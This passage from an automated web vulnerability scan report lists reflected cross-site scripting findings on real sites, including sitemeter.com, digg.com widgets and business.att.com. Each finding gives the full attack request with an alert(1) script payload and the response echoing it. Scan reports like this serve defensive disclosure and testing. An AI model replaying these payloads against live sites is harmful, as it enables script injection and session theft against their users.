Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:36 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator695f8';alert(1)//5ff8671c168', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator695f8';alert(1)//5ff8671c168';
// ]]>
...[SNIP]...
7.32. http://s28.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df6e'%3balert(1)//b8c17a2141b was submitted in the site parameter. This input was echoed as 3df6e';alert(1)//b8c17a2141b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s28japanator3df6e'%3balert(1)//b8c17a2141b HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:08 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator3df6e';alert(1)//b8c17a2141b', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator3df6e';alert(1)//b8c17a2141b';
// ]]>
...[SNIP]...
7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomopop.com
Path:   /index-ad-anime.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58591"><script>alert(1)</script>8ca5ec22d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40 HTTP/1.1
Host: tomopop.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:04:07 GMT
Server: lighttpd/1.4.28
Content-Length: 305146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="http://tomopop.com/index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40?start=10">
...[SNIP]...
7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5949b'%3balert(1)//02a670cbde0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5949b';alert(1)//02a670cbde0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605/5949b'%3balert(1)//02a670cbde0ae-1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:54 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8897

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605/5949b';alert(1)//02a670cbde0ae-1';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1bd2893c
...[SNIP]...
7.35. http://track.blvdstatus.com/js/track.php [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb3ab'%3balert(1)//fe30191df11 was submitted in the tid parameter. This input was echoed as fb3ab';alert(1)//fe30191df11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605ae-1fb3ab'%3balert(1)//fe30191df11 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8896

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605ae-1fb3ab';alert(1)//fe30191df11';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1b907640c3.6
...[SNIP]...
7.36. http://usjobsresource.com/3 [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e48"><script>alert(1)</script>e6cfb5723ff was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /3?s=31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff" />
...[SNIP]...
7.37. http://usjobsresource.com/3/ [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32f1f"><script>alert(1)</script>6df8703c622 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3/?s=31s-2100u32f1f"><script>alert(1)</script>6df8703c622 HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u32f1f"><script>alert(1)</script>6df8703c622" />
...[SNIP]...
7.38. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 24218<script>alert(1)</script>e84fc8187f6 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: traffic_control=-781655937076164456%3A203; d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; imp_id=1f0886feeb8786a6bbd1a6e1e240cbe5d902a47b7a6b64c4656307739e35a482; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 01 May 2011 23:25:30 GMT
Via: NS-CACHE: 100
Etag: "600917dcebe2f17e666a47431399dbfb32a9afc9"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 01 May 2011 23:35:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6", "diggs": 0});
7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the GUID request parameter is copied into an HTML comment. The payload 3f483--><script>alert(1)</script>0979b4e1029 was submitted in the GUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:34:43 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:34:43 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LPNFFQCT4WHVHB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601853; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=38f57a3139fe3100e934be119a8bde04; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
=ProductSub-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 -->
...[SNIP]...
7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 283a6"><script>alert(1)</script>97891412ffe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:20 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:20 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LZOJUPGBKPSHXB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610536; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=ecd6ef2ba3674bc7ffa69ff03589f6ed; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.17
Via: 1.1 12.120.79.17:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<link rel="canonical" href="http://www.business.att.com/enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/"/>
...[SNIP]...
7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9cfc'-alert(1)-'062611d0003 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-securityb9cfc'-alert(1)-'062611d0003/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:02:29 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:02:29 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=ZIAJEFC04ES2VB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579685; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=2cfd5fa64eb3b601400f181ff3de6124; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.18
Via: 1.1 12.120.79.18:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<s'+'cript language="javascript" src="http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-securityb9cfc'-alert(1)-'062611d0003]">
...[SNIP]...
7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69ba2"-alert(1)-"91dbea1c28a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security69ba2"-alert(1)-"91dbea1c28a/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:54 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:54 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=VYIV31SYKK2S1B4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610540; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=fc845523bb479e8fe404a8b911a72926; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.63
Via: 1.1 12.120.79.63:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
TTCampaign=EMPTY";
_cp_custom_array[n++]="ATTSource=null";
_cp_custom_array[n++]="ATTEBSegment=null";
_cp_custom_array[n++]="ATTECampaignID=null";
_cp_custom_array[n++]="ATTServicePort=network-security69ba2"-alert(1)-"91dbea1c28a";
_cp_custom_array[n++]="ATTCType=ProductSub-Category";
_cp_custom_array[n++]="ATTCValue=threat-vulnerability-management";
/** FR-ABS_0402 Remove Intellakey
_cp_cc='ATT';
_cp_pc='ATT101';
_cp_chc='ATT
...[SNIP]...
7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the WT.srch request parameter is copied into an HTML comment. The payload d5e22--><script>alert(1)</script>9c70c127f7e was submitted in the WT.srch parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:35:06 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:35:06 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=1YST0KTJBXSXPB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610337; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=faa58d0946d2d8a634695d2e0591c56e; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
b-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e -->
...[SNIP]...
7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4bdf4--><script>alert(1)</script>c023ff8d913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
